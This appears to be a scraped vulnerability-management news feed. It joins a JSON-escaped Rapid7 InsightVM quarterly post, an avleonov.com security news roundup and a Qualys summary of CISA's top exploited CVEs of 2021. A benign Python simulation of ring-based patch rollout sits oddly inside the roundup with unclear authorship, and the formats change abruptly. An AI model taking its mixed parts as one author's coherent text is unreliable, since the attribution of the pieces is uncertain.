installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. 
We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. 
As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. 
More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. 
Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-14T16:51:25", "description": "Hello everyone! This is the second episode of Vulnerability Management news and publications. 
In fact, this is a collection of my posts from the [avleonovcom](<https://t.me/avleonovcom>) and [avleonovrus](<https://t.me/avleonovrus>) Telegram channels. Therefore, if you want to read them earlier, subscribe to these channels.

_The main idea of this episode. Microsoft is a biased company. In fact, they should now be perceived as another US agency. Does this mean that we need to forget about Microsoft and stop tracking what they do? No, it doesn't. They do a lot of interesting things that can at least be researched and copied. Does this mean that we need to stop using Microsoft products? In some locations (you know which ones) for sure; in some we can continue to use such products if it is reasonable, but it's necessary to have a plan B. And this does not only apply to Microsoft. So, it's time for flexible approaches. Here we do it this way, there we do it differently. It seems that rather severe fragmentation of the IT market is a long-term trend and it's necessary to adapt to it._

Alternative video link (for Russia): <https://vk.com/video-149273431_456239097>

What's in this episode:

 1. Microsoft released a propaganda report, what does this mean for us?
 2. Microsoft released the Autopatch feature, is it a good idea to use it?
 3. Ridiculous Vulnerability: Hardcoded Password in Confluence Questions
 4. The new Nessus Expert and why it's probably Tenable's worst release
 5. Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird
 6. Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?
 7. 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization

## Microsoft released a propaganda report, what does this mean for us?

Let's start with the most important topic. Microsoft [released a propaganda report](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE50KOK>) about the evil Russians and how they (Microsoft) defend one well-known country. I usually avoid such topics, but in this case, I just can't.

 1. Most of the report is "water" and unproven "highly-likely" stuff. It's boring to read. More than half of the report is not about cyber attacks at all, but about propaganda/disinformation "attacks" in media, social networks, etc. With strange historical digressions. For example, they give a photo of some article from an Indian newspaper of the 1980s and write that this publication was organized by the KGB. I'm not kidding, look at page 12.
 2. On the other hand, the most important thing in this report is not what is written, but who released it. It's not mainstream media, it's not a government agency like the NSA or CIA, it's Microsoft, a global IT vendor that should, in theory, be more or less neutral. And now they are releasing such reports! If you still believe Microsoft is a non-government commercial company, look through this report. This position is the most official: the foreword was written by the current president of Microsoft.
 3. From a technical point of view, it is interesting that the state IT infrastructure was transferred to the cloud and Microsoft technologies (Defender for Endpoint?) were used to protect it. Almost all technical information is on the 9th page of the report.
 4. They write about 2 important security options. The first is that Microsoft made a free Vulnerability Management for them. "The first has been the use of technology acquired from RiskIQ that identifies and maps organizational attack surfaces, including devices that are unpatched against known vulnerabilities and therefore are the most susceptible to attack." It's not entirely clear how they did it. They could just connect hosts to Defender for Endpoint. But perhaps they massively activated the collection of data from hosts in some other way.
 5. The description of the second protection option hints at the existence of such non-standard methods: "MSTIC recognized that XXX malware could be mitigated meaningfully by turning on a feature in Microsoft Defender called controlled folder access. This typically would require that IT administrators access devices across their organization, work made more difficult and potentially even dangerous in ZZZ conditions. The YYY government therefore authorized Microsoft through special legal measures to act proactively and remotely to turn on this feature across devices throughout the government and across the country." And here it is not so important that Microsoft set up controlled folder access, it is important how they did it. It turns out that MS can massively remotely tweak security options if the government of a certain country has allowed them to do so. Wow! And what else can they do, on which hosts and under what conditions?
 6. The main concern, of course, is that Microsoft products, including cloud-based security services, are still widely used in Russian organizations. And not only in Russia, but also in other countries that have some disagreements with US policy. Such publications confirm that Microsoft is a highly biased and unstable IT vendor, and something needs to be done about it quickly.

And it would be fair to ask: "Weren't you, Alexander, promoting Microsoft's security services? And now you've turned against them?"

And it's easy to point to some posts from my blog:

 1. [Microsoft security solutions against ransomware and APT](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) (the best business breakfast I've ever had; the catering was top notch)
 2. [Microsoft Defender for Endpoint: Why You May Need It and How to Export Hosts via API in Python](<https://avleonov.com/2021/02/19/microsoft-defender-for-endpoint-why-you-may-need-it-and-how-to-export-hosts-via-api-in-python/>)
 3. [Getting Hosts from Microsoft Intune MDM using Python](<https://avleonov.com/2021/06/09/getting-hosts-from-microsoft-intune-mdm-using-python/>)
 4. [How to get Antivirus-related Data from Microsoft Defender for Endpoint using Intune and Graph API](<https://avleonov.com/2021/08/16/how-to-get-antivirus-related-data-from-microsoft-defender-for-endpoint-using-intune-and-graph-api/>)
 5. [Microsoft Defender for Endpoint: The Latest Versions of Antivirus Engine & Signatures](<https://avleonov.com/2021/09/14/microsoft-defender-for-endpoint-the-latest-versions-of-antivirus-engine-signatures/>)

It's paradoxical, but I don't have a post about exporting vulnerabilities from Defender for Endpoint. I was going to make a post about it, but there were always more important topics.

What can I say. I still think that Defender for Endpoint is a cool and user-friendly solution. Although sometimes it may be buggy. I also think it's logical to use your OS vendor's security services. Just because you already have complete trust in your OS vendor. Right? And other OS vendors should provide security services, as Microsoft does. But the question is what to do if it has become very difficult to trust your OS vendor? To put it mildly.

Not to say that I did not [write about such risks](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) at all:

"It will be a difficult decision to store this critical data in Microsoft cloud. Even with Microsoft’s guarantees that all the data is stored securely and they touch it with AI only."

But of course this was not enough. And 5 years ago, things looked very different.
¯\_(ツ)_/¯

## Microsoft released the Autopatch feature, is it a good idea to use it?

Continuing the topic of Microsoft security services. In mid-July, Microsoft [released the Autopatch feature](<https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-autopatch-is-now-generally-available/>) for Windows 10/11 with Enterprise E3 and E5 licenses (not regular, but more expensive licenses). Also, [Hybrid Azure Active Directory must be configured](<https://www.theregister.com/2022/07/12/windows_auopatch_live/>). But if everything is purchased and configured properly, then updates for MS products, drivers and other software (in the future) can be automatically installed from the MS cloud. And it will be more often than once a month. And in the correct way: if you install all updates on all hosts at the same time, there will be a high risk of mass failures. Therefore, patches will be installed gradually. If a failure is detected, the system administrator will be able to react and roll back the problematic patch.

"The 'test ring' contains a minimum number of devices, the 'first ring' roughly 1% of all endpoints in the corporate environment, the 'fast ring' around 9%, and the 'broad ring' the rest of 90% of devices.
The updates get deployed progressively, starting with the test ring and moving on to the larger sets of devices after a validation period that allows device performance monitoring and pre-update metrics comparison.
Windows Autopatch also has built-in Halt and Rollback features that will block updates from being applied to higher test rings or automatically rolled back to help resolve update issues."

Is it convenient? Yes, of course it's convenient. Is it dangerous? Well, it depends on trust in the vendor, faith in the vendor's stability and security. Speaking of Microsoft, this can be very controversial for many organizations in many locations.
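An added model of the ring mechanism quoted above (my illustration, not Microsoft's code): it places a constructed fleet into a test ring and ~1%/9%/90% rings by a stable hash, then halts and rolls back when a ring's post-update failure rate exceeds a constructed 5% threshold, so you can count how many devices a bad update reaches before it is stopped.

```python
"""Ring-based progressive rollout with halt and rollback.

Added illustration, not Microsoft's code: it models the ring sizes quoted for
Windows Autopatch (a small test ring, then roughly 1%, 9% and 90% of devices)
and the halt/rollback step between rings. Device ids, the test-ring size and
the 5% failure threshold are constructed assumptions.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

RING_ORDER = ["test", "first", "fast", "broad"]
# Share of the non-test fleet that each later ring receives.
RING_SHARES = {"first": 0.01, "fast": 0.09, "broad": 0.90}


def assign_rings(device_ids: List[str], test_ring_size: int = 5) -> Dict[str, List[str]]:
    """Place every device into exactly one ring.

    The first `test_ring_size` ids (sorted) form the test ring; the rest are
    bucketed by a stable hash, so a device keeps its ring between runs and
    the rollout order does not depend on the order of the input list.
    """
    ordered = sorted(device_ids)
    rings: Dict[str, List[str]] = {ring: [] for ring in RING_ORDER}
    rings["test"] = ordered[:test_ring_size]
    for dev in ordered[test_ring_size:]:
        # Map the digest to [0, 1) and walk the cumulative ring boundaries.
        point = int(hashlib.sha256(dev.encode()).hexdigest(), 16) / 2**256
        boundary = 0.0
        for ring in ("first", "fast", "broad"):
            boundary += RING_SHARES[ring]
            if point < boundary:
                rings[ring].append(dev)
                break
        else:
            rings["broad"].append(dev)  # guards against float rounding below 1.0
    return rings


@dataclass
class RolloutState:
    patched: List[str] = field(default_factory=list)  # devices the update reached
    failed: List[str] = field(default_factory=list)   # devices it broke
    halted_at: Optional[str] = None                   # ring where the halt fired
    rolled_back: bool = False


def run_rollout(rings: Dict[str, List[str]],
                outcome: Callable[[str], bool],
                failure_threshold: float = 0.05) -> RolloutState:
    """Deploy ring by ring; after each ring's validation period, halt and
    roll back if its failure rate exceeds `failure_threshold`.

    `outcome(device)` stands in for the post-update health check and returns
    True when the device is still healthy. len(state.patched) is the blast
    radius: how many devices saw the update before it was stopped.
    """
    state = RolloutState()
    for ring in RING_ORDER:
        devices = rings[ring]
        if not devices:
            continue
        failures = 0
        for dev in devices:
            state.patched.append(dev)
            if not outcome(dev):
                state.failed.append(dev)
                failures += 1
        if failures / len(devices) > failure_threshold:
            # Halt: no higher ring receives the update, and the rings already
            # patched are rolled back instead of being left broken.
            state.halted_at = ring
            state.rolled_back = True
            break
    return state


def demo_fleet(size: int = 1000) -> List[str]:
    """Constructed fleet of zero-padded device ids."""
    return [f"dev-{i:04d}" for i in range(size)]


if __name__ == "__main__":
    rings = assign_rings(demo_fleet())
    print({ring: len(devs) for ring, devs in rings.items()})
    # An update that breaks every device except the first ten: the test ring
    # passes, the ~1% ring fails, and the ~99% of the fleet behind it is spared.
    bad = run_rollout(rings, lambda dev: int(dev[-4:]) < 10)
    print(bad.halted_at, len(bad.patched), "devices reached before halt")
    good = run_rollout(rings, lambda dev: True)
    print(good.halted_at, len(good.patched), "devices patched")
```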
But in general, along with Defender for Endpoint (EDR, VM) and Intune, this Autopatch feature looks like a step in the right direction for the OS vendor. At least if we're talking about desktops. If you trust your OS vendor, it makes sense to trust that vendor's services to make life easier for system administrators and security guys. I don't know if vendors of commercial Linux distributions, including Russian ones, are thinking about this, but it seems it makes sense to take such concepts from MS.

On the other hand, such Autopatch is not a panacea, of course. Everything is not so trivial with updating third-party software. But MS seems to have a lot of resources to gradually move in this direction. Vulnerability detection for third-party software in Defender for Endpoint works quite well, which is also not an easy task. Therefore, I think they will be able to update such software in the future. If [Qualys can](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-zero-touch-patching-for-vulnerability-remediation/>), then MS will handle this as well.

## Ridiculous Vulnerability: Hardcoded Password in Confluence Questions

There has been a lot of news about [Confluence vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) this week. Atlassian has released three of them.

[CVE-2022-26136 & CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>): Multiple Servlet Filter vulnerabilities (authentication bypass, XSS, cross-origin resource sharing bypass). Many Atlassian products are vulnerable. Not only Confluence and JIRA, but also Bitbucket, for example. Everything is clear here: such installations need to be patched. And, ideally, it's time to stop using Atlassian products if you live and work in certain locations, because this vendor is unstable.

[CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>): Hardcoded password in Confluence Questions. This vulnerability is now the most hyped and ridiculous. If you install the optional Confluence Questions app, it creates a disabledsystemuser user with a hardcoded password. And this user is not disabled! The password is already publicly available. If you are logged in as this user, you can read the pages accessible to the confluence-users group. Well, isn't it funny? This can be fixed by patching or by blocking/deleting the user.

What can be said here:

 1. Plugins and extensions are evil and usually the most vulnerable. Try to avoid them.
 2. This is what backdoors in software can look like. The exploitation is very simple, and the vendor can always say "oh, sorry, that was a bug".
 3. Those who make Confluence and similar services available on the network perimeter are their own enemies.

## The new Nessus Expert and why it's probably Tenable's worst release

Tenable [introduced Nessus Expert](<https://www.tenable.com/blog/introducing-nessus-expert-now-built-for-the-modern-attack-surface>). They have Nessus Professional, and now there will be Nessus Expert with new features:

 1. [Infrastructure as Code Scanning](<https://youtu.be/Ks5XN0ZpzBw>). In fact, they added [Terrascan](<https://runterrascan.io/>) (acquired this year) to Nessus. So far, it looks very sloppy. This is a separate independent tab in the menu; scan results cannot be viewed in the GUI and can only be downloaded as a JSON file.
 2. [External attack surface scanning](<https://youtu.be/_TYvN_GS-AA>). They took these features from [Bit Discovery](<https://www.whitehatsec.com/bit-discovery/>) (also acquired this year). You can run a scan that will look for subdomains of a domain. But only for 5 domains per quarter. If you want more, you need to pay extra. Not to say that this is some kind of exclusive feature. The results can be viewed in the GUI. But that's all. There is no synergy with the usual functionality of Nessus.

The press release recalls how [Renaud Deraison](<https://t.me/avleonovcom/966>) released the first Nessus 24 years ago. But under him, and even more so under Ron Gula, there were no such terrible releases with freshly bought functionality attached to the main product "with blue electrical tape". And such a Frankenstein monster could never have been presented as a new product. Sadness and marketing. Let's see if it gets better with time.

## Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird

I looked at the new features in [Rapid7 Nexpose/InsightVM added in Q2 2022](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>). Some changes are like "OMG, how did they live without it?!"

They just added support for CVSS v3 severity in dashboards. CVSS v3 was released in June 2015. CVSS v3 data has been available in NVD since 2017. And now, 5 years after that, Rapid7 decided to take these data into account as well? Well, ok.

Or that they used to have such weird patching dashboards that progress on a Remediation Project was only visible when the patches were applied to all assets. And now it's better: "Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress". Indeed, better late than never.

Rapid7 just added support for AlmaLinux and Rocky Linux. Although stable versions of these distributions appeared more than a year ago and are already actively used in enterprise businesses as a replacement for CentOS.
It turns out that Rapid7 clients have only just got the opportunity to scan these distributions.

Rapid7 uses the term "recurring coverage" for supported software products. And they have a [public list of such products](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>). "The following software list encompasses those products and services that we are specifically committed to providing ongoing, automated coverage". The list is not very big, but it's cool that it's public.

On the other hand, there are cool features. At least one, [Scan Assistant](<https://docs.rapid7.com/insightvm/scan-assistant/>). This feature was introduced in December last year, but now it has been improved. This is an agent that does not collect or analyze data, but is only needed for authentication. It solves the problems of using system accounts for scanning, which can be very risky if the scanner host or one of the targets is compromised. This way you can install Scan Assistant on hosts, and the vulnerability scanner will authenticate to hosts using certificates rather than real system accounts.

"Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter."

This is a cool and useful feature. As far as I know, other VM vendors do not have this. In Q2, Rapid7 added some automation for updating this Scan Assistant and rotating certificates. It's cool that the functionality is evolving. But for now, it's only for Windows.

And there are updates that did not cause any special emotions in me. These are, for example, asset correlation for Citrix VDI instances and vulnerability detection for Oracle E-Business Suite and VMware Horizon. They were added, and that's good.

## Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?

The ["Palo Alto 2022 Unit 42 Incident Response Report" makes the amusing claim](<https://unit42.paloaltonetworks.com/incident-response-report/>) that attackers typically start scanning organizations' perimeters for vulnerabilities 15 minutes after a CVE is published.

Just like this:

"The 2021 Attack Surface Management Threat Report found that attackers typically start scanning for vulnerabilities within 15 minutes of a CVE being announced."

They do not write how exactly they got these 15 minutes. Or I didn't find it. But apparently they could detect attempts to exploit some specific vulnerabilities. They could use honeypots or IDS for this. And then they could get the difference between the timestamp of exploitation and the timestamp of vulnerability publication.

[There is an example](<https://unit42.paloaltonetworks.com/cve-2022-1388/>) where 5 days after some vulnerability was published, they released a detection signature. And in 10 hours, they collected two and a half thousand attempts to exploit this vulnerability.

"For example, Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (CVE-2022-1388), and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts".

It's cool, of course. But still, the signature was not released immediately. Therefore, it is difficult to say exactly when the malicious scans began.

But that's not the point. It is not so important whether the scans really start after 15 minutes or some time later. The fact is that attackers monitor the news flow about vulnerabilities. And the fact that they are motivated to scan your perimeter more often than you. And they are motivated to use non-standard checks for this. Not just the ones in your commercial vulnerability scanner.

Therefore, there are only two options. You can compete in speed with attackers. Or you may know and control your perimeter far better than any outside researcher can. This means that you must understand why a particular service is needed on the perimeter. And wherever possible, minimize the number of such services. For such services, you should specifically monitor security bulletins and start responding even before detection checks appear in vulnerability scanners. And of course before the media starts screaming about this vulnerability.

Of course, it's easier said than done.

## 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization

In the same "[Palo Alto 2022 Unit 42 Incident Response Report](<https://unit42.paloaltonetworks.com/incident-response-report/>)" there is one more interesting point: groups of vulnerabilities that were most often used in attacks. "For cases where responders positively identified the vulnerability exploited by the threat actor, more than 87% of them fell into one of six CVE categories."

CVE categories:

 * 55% Microsoft Exchange ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
 * 14% Log4j
 * 7% SonicWall CVEs
 * 5% Microsoft Exchange ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
 * 4% Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
 * 3% Fortinet CVEs
 * 13% Other

On the one hand, this can be used to prioritize vulnerabilities. And also to identify software and software groups that need special monitoring. I would also like to look at the vulnerabilities in the Other category. But unfortunately they are not included in the report.

On the other hand, it shows how all these vulnerabilities and incidents depend on a particular region. Well, of course Microsoft Exchange is used everywhere. Log4j has also affected almost every organization in one way or another. Perhaps in our region, I mean in Russia, some organizations use Fortinet. But SonicWall and Zoho look absolutely exotic. And in those locations where Unit 42 solves incident response cases, these are very important vendors and products.

Or we can remember [last year's story with Kaseya VSA](<https://avleonov.com/2021/07/05/last-weeks-security-news-printnightmare-kaseya-intune-metasploit-docker-escape/>). Thousands of companies were affected by the ransomware. But again, it was not in our region and therefore it was not particularly interesting for us.

Taking into account the exodus of Western vendors from the Russian IT market, the landscapes "here" and "there" will differ more and more. More and more incidents in Russia will occur due to vulnerabilities in our local software. In software that Western information security vendors may never have heard of. BTW, have you heard about [1C](<https://en.wikipedia.org/wiki/1C_Company>) ([Odin-Ass](<https://pikabu.ru/story/rossiyskiy_ryinok_programmnogo_obespecheniya_takoy_strannyiy_3895019>))? And it works both ways. Does this mean that in Russia we will need Vulnerability Management solutions focused on our Russian IT realities? Well, apparently yes. And something tells me that this will not only happen in Russia.

It seems that the time of total globalization in IT is running out. And the ability of VM vendors to relatively easily take positions in new regions is also disappearing. The great fragmentation is coming. But it will be even more interesting that way.

Source: [Vulnerability Management news and publications #2](<https://avleonov.com/2022/08/14/vulnerability-management-news-and-publications-2/>), avleonov.com, published 2022-08-14.

_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021.
This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._

The Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.

To that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.

Of special interest in the report is this key finding by CISA:

_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._

### CISA’s Top 15 Routinely Exploited Vulnerabilities of 2021

The top 15 routinely exploited vulnerabilities observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:

CVE | Vulnerability Name | Vendor and Product | Type
---|---|---|---
[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j | Remote code execution (RCE)
[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | | Zoho ManageEngine AD SelfService Plus | RCE
[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | ProxyShell | Microsoft Exchange Server | Elevation of privilege
[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | ProxyShell | Microsoft Exchange Server | RCE
[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | ProxyShell | Microsoft Exchange Server | Security feature bypass
[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>) | Microsoft Exchange Server | RCE
[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>) | Microsoft Exchange Server | RCE
[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>) | Microsoft Exchange Server | RCE
[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>) | Microsoft Exchange Server | RCE
[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | | Atlassian Confluence Server and Data Center | Arbitrary code execution
[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) | | VMware vSphere Client | RCE
[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>) | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | | Microsoft Exchange Server | RCE
[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | | Pulse Secure Pulse Connect Secure | Arbitrary file reading
[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | | Fortinet FortiOS and FortiProxy | Path traversal

### Highlights of Top Vulnerabilities Cited in CISA 2021 Report

Based on the analysis of this report by the Qualys Research Team, let’s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.

#### Log4Shell Vulnerability

The Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4j and were vulnerable to Log4Shell exploitation.

Visit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.

#### ProxyShell: Multiple Vulnerabilities

The multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and escalate privileges.

#### ProxyLogon: Multiple Vulnerabilities

The multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.

